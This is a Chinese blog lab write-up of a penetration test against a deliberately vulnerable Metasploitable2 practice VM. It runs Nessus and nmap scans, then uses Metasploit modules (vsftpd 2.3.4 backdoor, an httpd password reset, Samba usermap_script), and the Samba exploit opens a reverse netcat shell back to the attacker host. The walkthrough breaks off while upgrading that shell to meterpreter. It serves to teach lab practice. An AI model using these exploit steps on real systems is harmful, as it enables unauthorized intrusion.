渗透测试MSTable2靶机实验

本文详述了对MSTable2靶机的渗透测试过程,包括使用Kali Linux进行环境配置,利用nessus扫描漏洞,通过msfconsole工具执行vsftpd、httpd、Samba等漏洞的攻击,最终成功获取meterpreter会话,并利用UnrealIRCd漏洞尝试建立连接。
摘要由CSDN通过智能技术生成

实验名称:渗透测试MSTable2靶机实验
实验目的:对MSTable2进行渗透测试
实验环境:操作系统:Kali Linux虚拟机一台(4G)MSTable2靶机一台
实验步骤:
一、先配置好实验环境再进行漏洞扫描
1、先配置好MSTable2靶机,配置IP为192.168.22.10
在这里插入图片描述
先使用Kali nessus进行对MSTable2的扫描
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
用nessus先进行扫描着,再实行渗透
(二)启动msfonsole框架,进行扫描
┌──(root💀k)-[~]
└─# msfconsole
开启msfonsole工具
在这里插入图片描述
1、使用扫描工具
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
如果不能扫描成功,就进行添加
在这里插入图片描述
再打开一个终端,使用msfconsole框架
在这里插入图片描述
可能存在漏洞,使用search
msf6 > db_nmap -A -T4 192.168.22.10
在这里插入图片描述
漏洞实施漏洞攻击
Vsftpd漏洞攻击
msf6 > search vsftpd 2.3.4 进行查找
在这里插入图片描述
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 引用模块
[] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.22.10 设置攻击目标主机的靶机
rhosts => 192.168.22.10
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 执行
在这里插入图片描述
2、httpd基本鉴权重置密码攻击(可进行拒绝服务攻击)
在这里插入图片描述
在这里插入图片描述
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use auxiliary/admin/http/intersil_pass_reset 引用模块
msf6 auxiliary(admin/http/intersil_pass_reset) > set rhosts 192.168.22.10
rhosts => 192.168.22.10 设置攻击目标靶机IP地址
msf6 auxiliary(admin/http/intersil_pass_reset) > run 执行
[
] Running module against 192.168.22.10
[*] Auxiliary module execution completed
在这里插入图片描述
msf6 auxiliary(admin/http/intersil_pass_reset) > info 查看漏洞模块详细信息
在这里插入图片描述
3、httpd mod 协商文件名
在这里插入图片描述
在这里插入图片描述
4、利用Samba漏洞实现任意命令行
在这里插入图片描述
msf6 auxiliary(scanner/http/mod_negotiation_brute) > search Samba 3.0.20

Matching Modules

Name Disclosure Date Rank Check Description


0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba “username map script” Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 auxiliary(scanner/http/mod_negotiation_brute) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set rhosts 192.168.22.10
rhosts => 192.168.22.10
msf6 exploit(multi/samba/usermap_script) > run

[] Started reverse TCP handler on 192.168.22.100:4444
[
] Command shell session 2 opened (192.168.22.100:4444 -> 192.168.22.10:40232) at 2021-02-02 15:02:17 +0800

ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
exit

[*] 192.168.22.10 - Command shell session 2 closed.
在这里插入图片描述
5、升级shell会话为meterpreter会话
接上一个先Ctrl+Z把shell会话放在后台
^Z
Background sess

  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值